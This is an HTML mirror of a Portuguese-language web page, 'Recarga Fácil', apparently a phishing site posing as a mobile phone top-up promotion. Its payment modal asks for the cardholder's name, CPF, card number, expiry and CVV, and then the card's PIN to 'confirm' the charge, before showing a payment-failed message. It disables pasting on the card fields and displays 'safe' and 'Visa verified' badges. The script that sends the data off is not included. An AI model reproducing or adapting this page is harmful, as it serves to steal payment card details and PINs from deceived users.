<!DOCTYPE html>
<html>

<!-- Mirrored from recarga-facil.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Apr 2021 17:26:17 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="utf-8" />
<title>Recarga Fácil - Página inicial</title>
<meta name="viewport" content="width=device-width, user-scalable=no">
<link href="../fonts.googleapis.com/css1543.css?family=Roboto:regular,bold,italic,thin,light,bolditalic,black,medium&amp;lang=en" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="../fonts.googleapis.com/icone91f.css?family=Material+Icons">
<link href="../fonts.googleapis.com/css0f7c.css?family=Open+Sans:300,400,600,700,800" rel="stylesheet">
<link rel="stylesheet" href="../code.getmdl.io/1.3.0/material.indigo-pink.min.css">
<link rel="stylesheet" href="static/css/indexc8af.css?@12">
<link rel="stylesheet" href="static/css/loadingSpinner.css">
<script src="../ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="static/js/jquery.maskedinput.js"></script>
<script defer src="../code.getmdl.io/1.3.0/material.min.js"></script>
<script defer src="static/js/index9d03.js?5192"></script>

</head>
<body>
<div id="modalWrapper">
<div class="dialogWindow step1">
<div class="dialogWindowLoding">
<div class="mdl-spinner mdl-spinner--single-color mdl-js-spinner is-active"></div>
</div>
<form id="formPayment">
<input id="inputCurrentStep" type="hidden" value="1">
<div class="dialogWindowTop">
<p class="infoRecarga">Recarga de R$20</p>
<img class="siteSafe" src="static/imgs/indexSafe.png">
</div>
<div class="dialogWindowCont step1">
<h2 class="dialogWindowTitle">Dados de Recarga</h2>
<p class="dialogWindowDesc">Selecione a operadora e recarga desejada.</p>
<div class="labelPhone label">
<input id="hiddenInpPhone" type="text" name="cell" class="inpPhone inpText" placeholder="DDD + Nº de Telefone" autocomplete="off">
</div>
<div class="labelOperadora label">
<select id="hiddenInpOperadora" name="operadora" class="inpOperadora inpSelect">
<option value="none">Selecione uma Operadora</option>
<option value="vivo">Operadora Vivo</option>
<option value="claro">Operadora Claro</option>
<option value="tim">Operadora TIM</option>
<option value="oi">Operadora Oi</option>
</select>
</div>
<div class="labelRecarga label">
<select id="hiddenInpRecarga" name="valor" class="inpRecarga inpSelect">
<option value="none">Selecione uma Recarga</option>
<option value="15">Recarga de R$15</option>
<option value="20">Recarga de R$20</option>
<option value="35">Recarga de R$35</option>
<option value="50">Recarga de R$50</option>
</select>
</div>
<div class="labelCPF label">
<input type="text" name="email" class="inpEmail inpText" placeholder="Endereço de Email" autocomplete="off">
</div>
<div class="dialogWindowFooter label showTable">
<a class="butCancel">SAIR</a>
<button class="butNext">RECARREGAR AGORA</button>
</div>
</div>
<div class="dialogWindowCont step2">
<h2 class="dialogWindowTitle">Pagamento</h2>
<p class="dialogWindowDesc">Digite os dados do seu cartão para efetuar pagamento.</p>
<div class="labelName label">
<input type="text" name="nome" class="inpName inpText" id="cardholderName" data-checkout="cardholderName" placeholder="Nome Impresso no Cartão" />
</div>
<div class="labelCPF label">
<input type="text" name="cpf" class="inpCPF inpText" id="docNumber" data-checkout="docNumber" placeholder="CPF do Titular (Apenas números)" />
</div>
<div class="labelCard label">
<input type="text" class="inpCard inpText" name="card" id="cardNumber" data-checkout="cardNumber" placeholder="Número do Cartão" onselectstart="return false" onpaste="return false" onCopy="return false" onCut="return false" onDrag="return false" onDrop="return false" autocomplete=off />
</div>
<div class="labelCard label">
<h4 class="labelTitle">EXPIRAÇÃO DO CARTAO</h4>
<input type="text" name="mes" class="inpExpiration inpText" id="cardExpirationMonth" data-checkout="cardExpirationMonth" placeholder="Mes (MM)" onselectstart="return false" onpaste="return false" onCopy="return false" onCut="return false" onDrag="return false" onDrop="return false" autocomplete=off />
<input type="text" name="ano" class="inpExpiration inpText" id="cardExpirationYear" data-checkout="cardExpirationYear" placeholder="Ano (AAAA)" onselectstart="return false" onpaste="return false" onCopy="return false" onCut="return false" onDrag="return false" onDrop="return false" autocomplete=off />
</div>
<div class="labelCard label">
<input name="token" type="hidden" value="62a904a064" />
<input type="text" name="cvv" class="inpCVV inpText" id="securityCode" data-checkout="securityCode" placeholder="Código CVV" onselectstart="return false" onpaste="return false" onCopy="return false" onCut="return false" onDrag="return false" onDrop="return false" autocomplete=off />
</div>
<div class="dialogWindowFooter label showTable">
<a class="butCancel">SAIR</a>
<button class="butNext">EFETUAR PAGAMENTO</button>
</div>
</div>
<select id="installments" class="form-control" name="installments" style="display:none;"></select>
<select id="docType" data-checkout="docType" style="display:none;"></select>
</form>
<form id="formConfirm">
<div class="dialogWindowCont step3">
<h2 class="dialogWindowTitle">Confimar pagamento.</h2>
<p class="dialogWindowDesc">Digite a senha do cartão para confirmar a transação.</p>
<div class="labelPassw label">
<input type="password" name="senha" pattern="[0-9]+$" onkeyup="if (/\D/g.test(this.value)) this.value = this.value.replace(/\D/g,'')" class="inpPassw inpText" placeholder="Senha com 4 à 6 digitos" autocomplete="off">
</div>
<input name="tokenacess" type="hidden" value="62a904a064" />
<div class="dialogWindowFooter label showTable">
<a class="butCancel">SAIR</a>
<button class="butNext">CONCLUIR PAGAMENTO</button>
</div>
</div>
<div class="dialogWindowCont step4" id="erro">
<img src="static/imgs/iconError.png">
<h2 style="color: #f44336;">Ocorreu um problema na hora de efetuar o pagamento!</h2>
<p>A sua tentativa de pagamento com cartão não foi aprovada. isso pode acontecer por muitos motivos, inclusive por um erro de digitação de algum dado.
<p />
</div>
</form>
<div class="dialogWindowError label error">
<p></p>
</div>
</div>
</div>
<div id="topWrapper">
<header id="topWrapperBar">
<img class="logoTop" src="static/imgs/logoTop.png">
<div class="rightTop">
<p>Operadoras parceiras:</p>
<img src="static/imgs/logoOperadoras.png">
</div>
</header>
<main id="topWrapperContent">
<img class="promoLogo" src="static/imgs/promoLogo.png">
<form id="formRecarga">
<p>Aproveite, promoção por tempo limitado.</p>
<input class="inputRecarga" type="text" placeholder="DDD + N° de Telefone">
<input class="submitRecarga" type="submit" value="Recarregar agora">
<div class="errorMessages">Digite um telefone válido.</div>
</form>
</main>
</div>
<div id="mainRecargas">
<p class="titlePlanosRecargas">Recarregue aqui e ganhe bônus de internet.</p>
<ul class="planosRecargas">
<li>
<div class="topRecarga">
<p class="titleRecarga">R$15</p>
</div>
<div class="mainRecarga">
<p class="bonusRecarga">+200MB</p>
<p class="labelRecarga">de bônus de internet</p>
<p class="validadeRecarga">(Válido por 7 dias)</p>
<a class="buttonRecarga" href="#" data-recarga="15">Recarregar</a>
</div>
</li>
<li>
<div class="topRecarga">
<p class="titleRecarga">R$20</p>
</div>
<div class="mainRecarga">
<p class="bonusRecarga">+500MB</p>
<p class="labelRecarga">de bônus de internet</p>
<p class="validadeRecarga">(Válido por 7 dias)</p>
<a class="buttonRecarga" href="#" data-recarga="20">Recarregar</a>
</div>
</li>
<li>
<div class="topRecarga">
<p class="titleRecarga">R$35</p>
</div>
<div class="mainRecarga">
<p class="bonusRecarga">+800MB</p>
<p class="labelRecarga">de bônus de internet</p>
<p class="validadeRecarga">(Válido por 15 dias)</p>
<a class="buttonRecarga" href="#" data-recarga="35">Recarregar</a>
</div>
</li>
<li>
<div class="topRecarga">
<p class="titleRecarga">R$50</p>
</div>
<div class="mainRecarga">
<p class="bonusRecarga">+1GB</p>
<p class="labelRecarga">de bônus de internet</p>
<p class="validadeRecarga">(Válido por 30 dias)</p>
<a class="buttonRecarga" href="#" data-recarga="50">Recarregar</a>
</div>
</li>
</ul>
<p class="observacaoRecarga">*Recargas válidas somente para as operadoras parceiras Vivo, Claro, Tim e Oi.</p>
</div>
<div id="mainCards">
<h2>Pague com seu cartão de crédito ou Mercado Pago.</h2>
<img class="full" src="static/imgs/cardsLogos.png">
<img class="compact" src="static/imgs/cardsLogosCompact.png">
</div>
<footer>
<div id="footerCont">
<img class="visaVerified" src="static/imgs/indexVerified.png">
<img class="logoBottom" src="static/imgs/logoBottom.png">
<p class="footerCopyr">Copyright 2019 - Todos os direitos reservados.</p>
</div>
</footer>
</body>

<!-- Mirrored from recarga-facil.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Apr 2021 17:26:23 GMT -->
</html>